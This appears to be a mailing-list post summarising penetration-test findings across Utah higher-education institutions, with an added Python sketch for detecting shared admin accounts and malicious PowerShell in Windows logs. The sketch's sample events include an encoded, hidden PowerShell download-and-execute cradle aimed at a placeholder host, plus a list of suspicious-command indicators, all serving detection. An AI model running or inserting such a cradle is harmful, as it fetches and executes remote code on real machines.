Hey guys,
I'm presenting briefly at the NISST meeting tomorrow. Below is the list of generalized findings that Mark and I presented to the CIOs last summer; this is roughly what I'll mention tomorrow. What else should we mention?
The Good
Each USHE institution has an information security officer/office or has formally assigned Information Security roles to appropriate IT staff.
Intrusion Detection/Prevention Systems (IDS/IPS) are installed ubiquitously across USHE institutions; implementations vary, but all schools have the capability to detect and respond to scanning and other widespread or noisy attacks.
Two-factor authentication is becoming common at USHE institutions. Duo Security is the popular favorite. Properly implemented two-factor authentication slowed or stopped multiple team attacks, especially during the second fiscal year of this assessment cycle.
Internal network segmentation is common and effective against some direct attacks on infrastructure. Banner / PeopleSoft infrastructure is well protected in this manner.
All institutions are doing regular vulnerability scanning and acting on scan results. There are relatively few ‘low-hanging fruit’ remotely-exploitable vulnerabilities in the production networks at USHE institutions.
Overall, incremental improvements in security posture were found at all institutions.
The Bad
Misconfigured wireless devices are easily abused to obtain hashed credentials. The team was able to get valuable credentials using this attack at all USHE institutions.
Password length and complexity at USHE schools is inadequate. Approximately 30% of hashed credentials obtained by the team at each institution were cracked. Many of these credentials included IT and/or functional staff with privileged access to data or infrastructure.
Once directory credentials are obtained, it is mostly trivial to traverse internal networks, enumerate directory services, and, depending on institutional practices, elevate to administrative credentials. Administrative credentials led to 'pivots' into sensitive or critical systems and networks.
Physical security is a mixed bag; the team was able to gain physical access to network and/or data center facilities at several institutions.
The Ugly
System administrators often use the same accounts for day-to-day tasks and for administration of critical systems. This is bad practice and was leveraged by the team at several institutions to obtain administrative access to critical systems.
Many attack methods and tools use native tools and systems (e.g. Windows PowerShell) that are mostly invisible to IDS/IPS and anti-malware because they appear to be legitimate activity, often using captured account credentials. These tools are leveraged heavily by the assessment team and presumably by attackers. No institution currently has systems in place to find anomalous behavior of this kind.
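As an added illustration (not part of the findings list, and not code from any institution or vendor), here is a small Python sketch of the kind of log-based detection the two findings above call for: correlating Windows logon events (4624) to find accounts used interactively both on workstations and on critical hosts, and flagging encoded or download-cradle PowerShell in process-creation events (4688). The host names, account names, event records and tier lists are all constructed for the example; the suspicious-string list is a starting heuristic, not a complete signature set.

```python
import base64
import re
from collections import defaultdict

# Assumed tiering for the example: which hosts are critical (ERP/AD) and which are
# daily-use endpoints. In practice this would come from CMDB / AD OU membership.
CRITICAL_HOSTS = {"BANNER-DB01", "DC01"}
WORKSTATIONS = {"WS-ITSTAFF7", "WS-LIB22"}
INTERACTIVE_LOGON_TYPES = {"2", "10"}  # 2 = console, 10 = RDP

# Constructed sample events mirroring the fields of Security events 4624 and 4688.
# "jsmith" uses one account everywhere and runs an encoded download cradle;
# "mlee" uses a separate adm- account for the domain controller.
EVENTS = [
    {"id": "4624", "host": "WS-ITSTAFF7", "user": "jsmith", "logon_type": "2"},
    {"id": "4624", "host": "BANNER-DB01", "user": "jsmith", "logon_type": "10"},
    {"id": "4624", "host": "WS-LIB22", "user": "mlee", "logon_type": "2"},
    {"id": "4624", "host": "DC01", "user": "adm-mlee", "logon_type": "10"},
    {"id": "4688", "host": "WS-ITSTAFF7", "user": "jsmith",
     "cmdline": "powershell.exe -nop -w hidden -enc " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
         .encode("utf-16le")).decode()},
    {"id": "4688", "host": "WS-LIB22", "user": "mlee",
     "cmdline": "powershell.exe -File C:\\scripts\\inventory.ps1"},
]


def mixed_use_accounts(events):
    """Accounts that logged on interactively to both a workstation and a critical host.

    That pattern is the 'same account for daily work and for administration'
    finding; an account that only ever touches one tier is not flagged.
    """
    tiers_seen = defaultdict(set)
    for e in events:
        if e["id"] != "4624" or e["logon_type"] not in INTERACTIVE_LOGON_TYPES:
            continue
        if e["host"] in WORKSTATIONS:
            tiers_seen[e["user"]].add("workstation")
        elif e["host"] in CRITICAL_HOSTS:
            tiers_seen[e["user"]].add("critical")
    return sorted(u for u, t in tiers_seen.items() if t == {"workstation", "critical"})


# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the common ones.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Lower-cased indicators checked against the command line plus the decoded payload.
SUSPICIOUS = ("downloadstring", "iex", "invoke-expression", "-w hidden", "-nop",
              "frombase64string")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (UTF-16LE base64), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def suspicious_powershell(events):
    """Process-creation events whose PowerShell command line (after decoding) looks hostile."""
    hits = []
    for e in events:
        if e["id"] != "4688" or "powershell" not in e["cmdline"].lower():
            continue
        decoded = decode_encoded_command(e["cmdline"]) or ""
        text = (e["cmdline"] + " " + decoded).lower()
        indicators = [s for s in SUSPICIOUS if s in text]
        if indicators:
            hits.append({"host": e["host"], "user": e["user"],
                         "indicators": indicators, "decoded": decoded})
    return hits


if __name__ == "__main__":
    print("mixed-use accounts:", mixed_use_accounts(EVENTS))
    for h in suspicious_powershell(EVENTS):
        print("suspicious PowerShell on", h["host"], "by", h["user"], h["indicators"])
        print("  decoded:", h["decoded"])
```

The point of the first check is that neither logon is suspicious on its own; only the correlation across tiers reveals a shared account. The second check matters because IDS/IPS and anti-malware see a signed Microsoft binary, so the only useful signal is the command line and its decoded payload, which requires process-creation auditing with command-line logging (or Script Block Logging, event 4104) to be enabled in the first place.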
Two-factor authentication only protects interactive logins. In many cases, other services that cannot use two-factor authentication (e.g. Microsoft RPC services) were still exposed and used by the team to bypass two-factor authentication.
Social engineering will always be with us. Phishing emails, unlocked workstations, ‘lost’ USB devices, and in some cases, Helpdesk agents were helpful in team efforts to gain administrative access to institutional IT resources.